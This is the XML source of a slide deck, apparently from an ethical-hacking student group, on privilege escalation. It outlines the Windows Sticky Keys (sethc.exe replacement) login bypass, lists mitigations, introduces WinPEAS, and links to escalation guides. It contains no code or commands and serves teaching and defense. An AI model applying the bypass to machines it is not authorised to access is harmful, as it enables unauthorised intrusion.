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1"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId2"/>
    <p:sldId id="257" r:id="rId3"/>
    <p:sldId id="258" r:id="rId4"/>
    <p:sldId id="259" r:id="rId5"/>
    <p:sldId id="273" r:id="rId6"/>
    <p:sldId id="275" r:id="rId7"/>
    <p:sldId id="277" r:id="rId8"/>
    <p:sldId id="276" r:id="rId9"/>
    <p:sldId id="268" r:id="rId10"/>
    <p:sldId id="294" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="289" r:id="rId14"/>
    <p:sldId id="279" r:id="rId15"/>
    <p:sldId id="271" r:id="rId16"/>
    <p:sldId id="267" r:id="rId17"/>
    <p:sldId id="290" r:id="rId18"/>
    <p:sldId id="291" r:id="rId19"/>
    <p:sldId id="280" r:id="rId20"/>
    <p:sldId id="287" r:id="rId21"/>
    <p:sldId id="284" r:id="rId22"/>
    <p:sldId id="285" r:id="rId23"/>
    <p:sldId id="274" r:id="rId24"/>
    <p:sldId id="292" r:id="rId25"/>
    <p:sldId id="293" r:id="rId26"/>
    <p:sldId id="270" r:id="rId27"/>
    <p:sldId id="272" r:id="rId28"/>
    <p:sldId id="262" r:id="rId29"/>
    <p:sldId id="263" r:id="rId30"/>
  </p:sldIdLst>
  <p:sldSz cx="9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId32"/>
      <p:bold r:id="rId33"/>
      <p:italic r:id="rId34"/>
      <p:boldItalic r:id="rId35"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Mon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68"/>
    <a:srgbClr val="09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978" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="78" d="100"/>
          <a:sy n="78" d="100"/>
        </p:scale>
        <p:origin x="159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ackernoon.com/-windows-sticky-keys-exploit-the-war-veteran-that-never-dies-its-very-likely-that-youve-heard-8ei2duh"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8c8c92569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8c8c92569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9892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2731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944174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b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3368215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427345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628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ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1430059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https://www.hackingarticles.in/hack-remote-pc-with-operation-aurora-attack/</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3835490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2801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787976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8df67c48a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8df67c48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249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5132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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1556513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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="381967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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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38798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https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/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36646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altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="882612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altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2916000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9bece4b73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9bece4b73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9bece4b73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9bece4b7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df67c48a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df67c48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c8c925694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c8c92569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654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2377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5022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104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8c92569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8c92569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https://hackingandcoffee.com/an-exercise-in-privilege-escalation-and-persistence/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can get to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prompt when running install CD or repair disk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When in the command prompt you change the sticky key script to exploitation one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Go to system folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Can it still be performed in Windows 10?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://hackernoon.com/-windows-sticky-keys-exploit-the-war-veteran-that-never-dies-its-very-likely-that-youve-heard-8ei2duh</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t>Does it still work? </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0" err="1"/>
              <a:t>Kinda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1100" dirty="0"/>
              <a:t> yes, because sticky key is not a vulnerability, it is a function</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But Microsoft did some patches </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Windows firewall preventing sethc.exe to run Cmd.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SFC restoring sethc.exe file back to it’s original.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Forbidding file modifications on the “System32” folder.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Removing "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>sethc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>" from the “System32” folder when accessing through the recovery mode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Password protecting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="ko-KR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F6F7F9"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> access in the troubleshooting mode.</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To prevent, disable sticky keys keyboard activation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Disabling </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>startup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> repair (not recommended)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>BIOS password</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="302321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a:off x="0" y="2834125"/>
            <a:ext cx="9144000" cy="252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16" name="Google Shape;16;p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Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="914400" lvl="1" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr marL="2286000" lvl="4" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2743200" lvl="5" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="■"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr marL="3200400" lvl="6" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3657600" lvl="7" indent="-317500">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="○"/>
              <a:defRPr>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-31750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17" name="Google Shape;17;p3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="767400"/>
            <a:ext cx="9144000" cy="252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767400"/>
            <a:ext cx="9144000" cy="252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0" y="767400"/>
            <a:ext cx="9144000" cy="252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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="298450" y="11510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p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="767400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1C1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767400"/>
            <a:ext cx="9144000" cy="252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title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="490250" y="450150"/>
            <a:ext cx="6367800" cy="30960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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-26525" y="3576475"/>
            <a:ext cx="9144000" cy="252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265500" y="238625"/>
            <a:ext cx="4115700" cy="247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Google Shape;44;p8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2834125"/>
            <a:ext cx="4572000" cy="252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33354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3250" y="95600"/>
            <a:ext cx="7417500" cy="576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09CECE"/>
              </a:buClr>
              <a:buSzPts val="2800"/>
              <a:buFont typeface="Roboto Mono"/>
              <a:buNone/>
              <a:defRPr sz="2800" b="1">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pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Google Shape;8;p1"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId12">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7968174" y="4326475"/>
            <a:ext cx="1175825" cy="817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arlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASex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ook.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklis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blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/"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ttack.mitre.org/tactics/TA000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600"/>
              <a:t>Ethical Student Hackers</a:t>
            </a:r>
            <a:endParaRPr sz="4600"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;57;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Privilege Escalation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Windows Sticky Keys</a:t>
            </a:r>
            <a:endParaRPr b="1" dirty="0">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AC0F758-BB9C-4D12-98E9-E6C6408291A1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="3407" t="5069" r="3207" b="61800"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418702" y="1100062"/>
            <a:ext cx="7862048" cy="1503126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77EBD0F1-BE62-4306-81C8-8D4BFEB4DFFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="307778" y="1100062"/>
            <a:ext cx="5499165" cy="3849414"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="366168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WinPEAS</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1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0" err="1"/>
              <a:t>WinPEAS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t> is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1500" dirty="0"/>
              <a:t>a script that search for possible paths to escalate privileges on Windows hosts.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0"/>
              <a:t>Check the link for what to exploit,  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/windows/windows-local-privilege-escalation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="75000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
